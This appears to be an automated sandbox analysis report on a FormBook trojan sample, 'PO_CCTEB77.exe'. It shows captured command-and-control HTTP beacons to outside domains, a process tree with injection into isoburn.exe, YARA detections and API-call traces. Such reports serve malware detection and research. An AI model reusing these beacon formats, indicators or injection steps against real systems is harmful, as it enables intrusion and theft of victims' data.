                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:51:14.368026972 CET | 242 | IN | HTTP/1.0 403 Forbidden
                                                                          Cache-Control: no-cache
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                          52 | 192.168.2.5 | 49771 | 37.97.254.27 | 80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:51:17.515954018 CET | 523 | OUT | GET /ahec/?KHcH=5igDJT3zPYxoznSYBBpd18gTi2dx8KCRz+D9mmXj9CLVcvHmJGefSTTLw3ACEWBDJ4ZMU5QrLRnI3LOtkf+zzorQEnBYkPkOfg==&Vjk=-N-tntX HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.wrautomotive.online
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:51:17.698211908 CET | 1340 | IN | HTTP/1.1 200 OK
                                                                          Date: Tue, 19 Sep 2023 17:56:11 GMT
                                                                          Server: Apache
                                                                          Last-Modified: Thu, 04 Nov 2021 09:16:05 GMT
                                                                          Vary: Accept-Encoding
                                                                          Content-Type: text/html
                                                                          Cache-Control: max-age=31536000
                                                                          X-Varnish: 628270294 3
                                                                          Age: 6393306
                                                                          Via: 1.1 varnish (Varnish/6.1)
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 64668
                                                                          Connection: close
                                                                          Data Ascii: <!DOCTYPE html><html> <head lang="en"> <meta charset="ascii"> <title>TransIP - Reserved domain</title> <meta name="description" content="TransIP - Reserved domain"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <link rel="shortcut icon" href="//reserved.transip.nl/assets/img/favicon.ico" type="image/x-icon" /> <link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,900' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="//reserved.transip.nl/assets/css/combined-min.css"> <title>Bezet!</title> </head> <body> <div class="container"> <div role="navigation" class="reserved-nav-container"> <div class="col-xs-6 reserved-nav-left reserved-nav-brand">



                                                                          Target ID:0
                                                                          Start time:18:47:09
                                                                          Start date:02/12/2023
                                                                          Path:C:\Users\user\Desktop\PO_CCTEB77.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\Desktop\PO_CCTEB77.exe
                                                                          Imagebase:0xdc0000
                                                                          File size:1'154'048 bytes
                                                                          MD5 hash:7391F0C0A4CD63ECEDEF46DBB072542C
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:3
                                                                          Start time:18:47:11
                                                                          Start date:02/12/2023
                                                                          Path:C:\Users\user\Desktop\PO_CCTEB77.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\Desktop\PO_CCTEB77.exe
                                                                          Imagebase:0xc40000
                                                                          File size:1'154'048 bytes
                                                                          MD5 hash:7391F0C0A4CD63ECEDEF46DBB072542C
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2154955744.0000000001730000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2154955744.0000000001730000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2155764463.0000000002560000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2155764463.0000000002560000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:4
                                                                          Start time:18:47:14
                                                                          Start date:02/12/2023
                                                                          Path:C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe"
                                                                          Imagebase:0xbd0000
                                                                          File size:140'800 bytes
                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4475055510.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4475055510.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          Target ID:5
                                                                          Start time:18:47:16
                                                                          Start date:02/12/2023
                                                                          Path:C:\Windows\SysWOW64\isoburn.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\isoburn.exe
                                                                          Imagebase:0xa40000
                                                                          File size:107'008 bytes
                                                                          MD5 hash:BF19DD525C7D23CAFC086E9CCB9C06C6
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4474939191.0000000003400000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4474939191.0000000003400000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4475032057.0000000003470000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4475032057.0000000003470000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:7
                                                                          Start time:18:47:27
                                                                          Start date:02/12/2023
                                                                          Path:C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe"
                                                                          Imagebase:0xbd0000
                                                                          File size:140'800 bytes
                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4479415286.0000000004DD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4479415286.0000000004DD0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          Target ID:8
                                                                          Start time:18:47:38
                                                                          Start date:02/12/2023
                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                          Imagebase:0x7ff79f9e0000
                                                                          File size:676'768 bytes
                                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true


                                                                            Execution Graph

                                                                            Execution Coverage:12.6%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:338
                                                                            Total number of Limit Nodes:19

                                                                            Control-flow Graph

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: "Q/$"Q/$"Q/$'eF9$'eF9$+U$+U
                                                                            • API String ID: 0-951757884
                                                                            • Opcode ID: f315192f534ce0e46199fd55147aa81f93b7396c1934fd6afe519c88251a3fc2
                                                                            • Instruction ID: 38b2da8cd01b292e3a73fd09e83ced47eb7082fc71189e373f3dd2ec6c557c92
                                                                            • Opcode Fuzzy Hash: f315192f534ce0e46199fd55147aa81f93b7396c1934fd6afe519c88251a3fc2
                                                                            • Instruction Fuzzy Hash: 4CC119B0D01219DFCB04CF99C4818AEFBF6FF88311B14A55AD516AB259D734EA82CF94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 5 1l$$]q$$]q$$]q$$]q
                                                                            • API String ID: 0-1421843763
                                                                            • Opcode ID: 828cba1808bde29d646f85bde9e232bb947570d20cab9942e3a14a21f544804a
                                                                            • Instruction ID: 028f1e23989e07a4a6c6d2a3d24e86d113b68a1b09a18ec6913f1a5d88e5a412
                                                                            • Opcode Fuzzy Hash: 828cba1808bde29d646f85bde9e232bb947570d20cab9942e3a14a21f544804a
                                                                            • Instruction Fuzzy Hash: CD91C474E01218CFDB54CFA5D994B9DBBB6BB88310F10849AD90AAB354DB346E85CF11
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: "Q/$"Q/$"Q/$'eF9
                                                                            • API String ID: 0-3836312280
                                                                            • Opcode ID: 108d81ec051d1d129dffbcd8414a42aa8bdbb5ab6bc16b1e8d905e68b8abfb82
                                                                            • Instruction ID: c198faa0b24001bde41cec7c358570e9f767f4debd9fccfed1d8e7271d2abe2c
                                                                            • Opcode Fuzzy Hash: 108d81ec051d1d129dffbcd8414a42aa8bdbb5ab6bc16b1e8d905e68b8abfb82
                                                                            • Instruction Fuzzy Hash: 22D14E70D11219DFDB04CFA9C8818AEFBF2FF89302B14A55AD516AB255D734EA42CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te]q$Te]q
                                                                            • API String ID: 0-3320153681
                                                                            • Opcode ID: 3097d68559ead0048a2b5db9b3fe306cdc2065541cd9b666223c7daec542c455
                                                                            • Instruction ID: 2667ee8e5f0ef94257ab43a0713cbcda166ab64b785395d494dc236ea978095e
                                                                            • Opcode Fuzzy Hash: 3097d68559ead0048a2b5db9b3fe306cdc2065541cd9b666223c7daec542c455
                                                                            • Instruction Fuzzy Hash: AAA12974E012498FCB08DFA9C9849DEBBF2FF8A311F14916ED815AB265D7305946CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te]q$Te]q
                                                                            • API String ID: 0-3320153681
                                                                            • Opcode ID: c7e872b651157c697486f4cddd511ed35690570ca7bb9333b8c51878cdfdd694
                                                                            • Instruction ID: fe7e8bd2dafd190640cad927077d7809d2fff2572b46c7547f4dfec7a72380f2
                                                                            • Opcode Fuzzy Hash: c7e872b651157c697486f4cddd511ed35690570ca7bb9333b8c51878cdfdd694
                                                                            • Instruction Fuzzy Hash: 5481B374E002098FDB08CFAAC98469EBBF2FF89311F14952AD519BB364D735A946CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 5 1l
                                                                            • API String ID: 0-1554365358
                                                                            • Opcode ID: 8808d23cfd8af4038f52a2d1cbbcee65abada37b9623919d991bc85e969ac8db
                                                                            • Instruction ID: 02c1d3aa383d487b17596f14b5f3d476510216b90f192b594c653d5111d4fe58
                                                                            • Opcode Fuzzy Hash: 8808d23cfd8af4038f52a2d1cbbcee65abada37b9623919d991bc85e969ac8db
                                                                            • Instruction Fuzzy Hash: AAF14470E05219CFDB14CFA9D884A9DFBF2FB89311F10A46AD40ABB654D738A946CF14
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 5 1l
                                                                            • API String ID: 0-1554365358
                                                                            • Opcode ID: 1edf8e8758e11b740e31bc22c9fedfbd4a835eca1e36dfebb45c1edacc041b20
                                                                            • Instruction ID: ffb49b977f5a5bbc672d0e896e921d9d4c9d56a2bbc2647cba55f92574467295
                                                                            • Opcode Fuzzy Hash: 1edf8e8758e11b740e31bc22c9fedfbd4a835eca1e36dfebb45c1edacc041b20
                                                                            • Instruction Fuzzy Hash: 17F13374E01219CFDB14CFA9D884A9DFBF2FB89311F10946AD40ABB654DB38A946CF14
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 5 1l
                                                                            • API String ID: 0-1554365358
                                                                            • Opcode ID: 13c1ae766bdc2b3b4b6b09f69c3d7431f6f2022b802b8cf9b33333e619407679
                                                                            • Instruction ID: 8317cc6b85b547171e19cc6cdee4fbeae7621cb2b94a3528e5fab7d4b00cc435
                                                                            • Opcode Fuzzy Hash: 13c1ae766bdc2b3b4b6b09f69c3d7431f6f2022b802b8cf9b33333e619407679
                                                                            • Instruction Fuzzy Hash: 51513574E01218CFCB54CFA9D944B9DBBB6FB88310F1094AAD50ABB354DB34AA85CF14
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 5 1l
                                                                            • API String ID: 0-1554365358
                                                                            • Opcode ID: 4cdc0a448682482e8556f3e89f0f1f0cbbe472524314f92b6d744bfb32557836
                                                                            • Instruction ID: e408fa50a373822e5144baf9fda419b74da492a95d1450d5c33517cec1a38a69
                                                                            • Opcode Fuzzy Hash: 4cdc0a448682482e8556f3e89f0f1f0cbbe472524314f92b6d744bfb32557836
                                                                            • Instruction Fuzzy Hash: 6D512674E01218CFCB54CFA9D945B9DBBB6FB88310F1094AAD50ABB354DB34AA85CF14
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ~552
                                                                            • API String ID: 0-3806510334
                                                                            • Opcode ID: ddc6fdf51176d4500972ab1568810bea114bbe07922cd480187d843ccaaca2ec
                                                                            • Instruction ID: 3e589455be0af503cfc23eaa7c514de5686c6a1420f142b6e6e1988fbfc2a23d
                                                                            • Opcode Fuzzy Hash: ddc6fdf51176d4500972ab1568810bea114bbe07922cd480187d843ccaaca2ec
                                                                            • Instruction Fuzzy Hash: 93312970E05344AFCB45DFB4C8448DEBFB1AF87302F21E4AAC845AB221D6345906DB55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2047976009.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6520000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6535453487e363ea698799c781e200f2340869289b295137820821f174573188
                                                                            • Instruction ID: 593766efba9ec9a189c79c5bd6895384d562cd2f0537c809d004f61f807bb6be
                                                                            • Opcode Fuzzy Hash: 6535453487e363ea698799c781e200f2340869289b295137820821f174573188
                                                                            • Instruction Fuzzy Hash: 1EB1C175E1031A8FCB04DFA4C8509DDFBBAFF9A300F148619E419AB2A4DB30E941CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2047976009.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6520000_PO_CCTEB77.jbxd
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0797B5DE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0797B5DE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0315B446
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2045356024.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_3150000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0797C9B5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06521E02
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2047976009.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6520000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06521E02
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2047976009.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6520000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 06524371
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2047976009.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6520000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: CallProcWindow
                                                                            • String ID:
                                                                            • API String ID: 2714655100-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 031560C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2045356024.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_3150000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 031560C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2045356024.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_3150000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0797B1B0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
